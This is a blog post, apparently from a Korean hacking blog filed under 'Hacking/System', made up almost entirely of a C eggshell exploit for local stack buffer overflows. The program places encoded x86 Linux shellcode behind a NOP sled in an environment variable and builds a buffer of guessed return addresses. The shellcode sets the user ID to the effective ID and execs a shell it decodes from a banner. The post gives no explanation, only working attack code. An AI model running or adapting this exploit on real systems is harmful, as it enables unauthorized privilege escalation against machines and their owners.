Hacking/System2010. 8. 12. 14:51
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

#define DEFAULT_OFFSET 0
#define DEFAULT_BUFFER_SIZE 512
#define DEFAULT_EGG_SIZE 2048
#define NOP 0x90

char shellcode[] =
"\x31\xc0\xb0\xc9\xcd\x80\x89\xc2\x31\xc0\xb0\x46\x31\xdb\x89\xd3\x31\xc9\x66\x89\xd9\xcd\x80\xeb\x50\x5e\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x04\xb3\x01\x89\xf1\xb2\x30\xcd\x80\x83\x06\x05\x83\x46\x01\x20\x83\x46\x02\x17\x83\x46\x03\x2d\x83\x6e\x04\x27\x83\x46\x05\x24\x83\x46\x06\x47\x83\x6e\x07\x21\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xab\xff\xff\xff\x2a\x42\x52\x41\x56\x4f\x21\x21\x20\x63\x6f\x6e\x67\x72\x61\x74\x75\x6c\x61\x74\x69\x6f\x6e\x7e\x2a\x0a\x2a\x68\x74\x74\x70\x3a\x2f\x2f\x62\x6c\x75\x65\x68\x34\x67\x2e\x6f\x72\x67\x2a\x0a";

unsigned long get_esp(void)
{
   __asm__("movl %esp,%eax");
}

int main(int argc, char *argv[])
{
   char *buff, *ptr, *egg;
   long *addr_ptr, addr;
   int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
   int i, eggsize=DEFAULT_EGG_SIZE;

   if (argc > 1) bsize = atoi(argv[1]);
   if (argc > 2) offset = atoi(argv[2]);
   if (argc > 3) eggsize = atoi(argv[3]);

   if (!(buff = malloc(bsize))) {
     printf("Can't allocate memory.\n");
     exit(0);
   }

   if (!(egg = malloc(eggsize))) {
     printf("Can't allocate memory.\n");
     exit(0);
   }

   addr = get_esp() - offset;

   printf("Using address: 0x%x\n", addr);

   ptr = buff;
   addr_ptr = (long *) ptr;
   for (i = 0; i < bsize; i+=4)
     *(addr_ptr++) = addr;

   ptr = egg;
   for(i = 0; i < eggsize - strlen(shellcode) - 1; i++)
     *(ptr++) = NOP;
   for(i = 0; i < strlen(shellcode); i++)
     *(ptr++) = shellcode[i];

   buff[bsize - 1] = '\0';
   egg[eggsize - 1] = '\0';
   memcpy(egg,"EGG=",4);
   putenv(egg);
   memcpy(buff,"RET=",4);
   putenv(buff);
   system("/bin/bash");
}

'Hacking > System' 카테고리의 다른 글

shellcode  (0) 2010.08.12
dumpcode.h  (1) 2010.08.11
Posted by zzibong